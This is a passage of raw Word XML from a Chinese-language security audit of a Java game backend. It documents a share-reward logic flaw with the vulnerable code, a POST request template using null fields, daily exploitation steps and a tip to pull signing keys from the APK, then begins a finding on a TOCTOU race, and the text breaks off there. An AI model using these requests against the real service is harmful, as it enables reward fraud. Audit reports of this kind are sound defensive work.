          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日都可被调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（去重分支同样执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>unlockSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），且对于尚未解锁坑位的用户来说一次请求即可完成永久性解锁。日常道具任务可每天重复领取，长期积累形成实质性经济收益。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="913"/>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914"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP 入口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@CurrentUserId Long userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来自 Token（不可伪造），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>form.getInviteeUserId()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来自请求体（完全攻击者可控）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Controller 仅校验 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviterUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 Token 是否一致，对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无任何约束直接透传</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareComplete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做字符串匹配路由：非 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"level2"/"level3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时（包含 null/空/任意其他值）直接进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyDailyOrLevel1Share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyDailyOrLevel1Share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅做自邀判断，随后无条件向 inviter 授予任务进度 +1 及坑位解锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="918"/>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：矿机坑位（"道具"+ 矿力位解锁）具有直接经济价值；日常任务自动发放的道具可长期积累形成规模化套利</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>❌ 存在漏洞的代码（完整调用链关键片段）：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入口：ShareController.java</w:t>
              <w:br/>
              <w:t>// ShareCompleteForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Long inviterUserId;   ← body 中传入（controller 仅校验与 Token 一致）</w:t>
              <w:br/>
              <w:t>//   Long inviteeUserId;   ← 攻击者完全可控，传 null 或任意非己 Long 均可</w:t>
              <w:br/>
              <w:t>//   String shareType;     ← 攻击者完全可控，传 null / "daily" / "level1" 均路由至 applyDailyOrLevel1Share</w:t>
              <w:br/>
              <w:t>@PostMapping("/complete")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; shareComplete(@CurrentUserId Long userId, @RequestBody ShareCompleteForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (form.getInviterUserId() != null &amp;&amp; !form.getInviterUserId().equals(userId)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("inviterUserId 须与当前登录用户一致");</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ↑ 仅校验 inviterUserId；inviteeUserId 与 shareType 完全无约束</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shareService.shareComplete(userId, form.getInviteeUserId(), form.getShareType()); // ← inviteeUserId 污点传入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 路由：ShareService.java#shareComplete</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareComplete(Long currentUserId, Long inviteeUserId, String shareType) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String type = shareType != null ? shareType.trim().toLowerCase() : "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level3".equals(type)) { ... return; }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level2".equals(type)) { ... return; }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    applyDailyOrLevel1Share(currentUserId, inviteeUserId); // ← shareType=null 时必走此分支，inviteeUserId 污点传入</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：ShareService.java#applyDailyOrLevel1Share</w:t>
              <w:br/>
              <w:t>public void applyDailyOrLevel1Share(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (inviteeUserId != null &amp;&amp; inviterUserId.equals(inviteeUserId)) { // ← 仅防自邀；inviteeUserId=null 或任意他人 ID 均可通过</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        throw new IllegalArgumentExceptio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>n("不允许本人参与本人分享的活动");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDate today = LocalDate.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(inviterUserId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("邀请用户不存在")); // ← 仅校验 inviter 存在，不校验 invitee</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ inviteeUserId 完全未被使用于任何关系验证</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (dailyTaskCompleteRecordRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .existsByUserIdAndCompleteDateAndTriggerCondition(inviterUserId, today, "1")) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.unlockSlot(inviterUserId, 7, 1); // ← 重复调用仍执行坑位解锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(inviterUserId, "1", 1); // ← 漏洞点：无任何真实分享证明即授予每日任务进度</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.unlockSlot(inviterUserId, 7, 1);               // ← 漏洞点：永久解锁矿机坑位无真实性前提</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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者自身有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;current_unix_ms&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机字符串&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按 ParamSortSignUtils 规则计算的合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviterUserId": null,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviteeUserId": null,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "shareType": 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&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId=null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时自邀检测短路跳过（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null != null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 false），直接进入奖励流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者持有合法账号登录，获取有效 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">按 SignAuthTestFilter 要求的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ParamSortSignUtils</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 规则，对请求体 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 计算合法签名（app key/secret 可从移动端 APK 逆向提取）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日发送上述 POST 请求一次，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不传或传任意非 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>level2/level3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或任意一个非己用户 ID；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每次调用无条件触发：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(userId, "1", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 日常分享任务进度 +1，任务达标后自动发放道具奖励；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.unlockSlot(userId, 7, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 永久解锁 7 号矿机坑位（首次调用生效，之后幂等）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日重复操作，持续获取道具奖励，无需在任何社交平台执行真实分享行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="926"/>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（需合法 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="927"/>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普通注册用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；同时需满足 SignAuthTestFilter 的请求签名（app key/secret 可从客户端逆向获取）</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28"/>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ShareService.java.shareLevel2Success → UserInvitationRecord.java.setInviteTime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audit_m193_877_shareComplete_ctrl-path8of23.md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：ShareService.java#shareLevel2Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_43" w:id="43"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞42：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> FOR UPDATE 对空行无效——首次处理时 TOCTOU 竞态导致任务进度双倍计入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="929"/>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 xml:space="preserve">：分享邀请奖励 TOCTOU 竞态——FOR UPDATE 仅锁已存在行，新邀请对首次并发请求无保护，可触发双倍 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>unlockSlot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="930"/>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src/main/java/com/gameBack/mjservice/service/ShareService.java:shareLevel2Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="931"/>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932"/>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933"/>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：普通用户（需持有有效 Bearer Token，且须拥有至少一个满足 level2/level3 条件、此前从未处理过的被邀请人）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shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（即 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）作为核心幂等防护，开发者注释也明确写道："FOR UPDATE 防并发双请求重复 updateProgress"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>然而，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
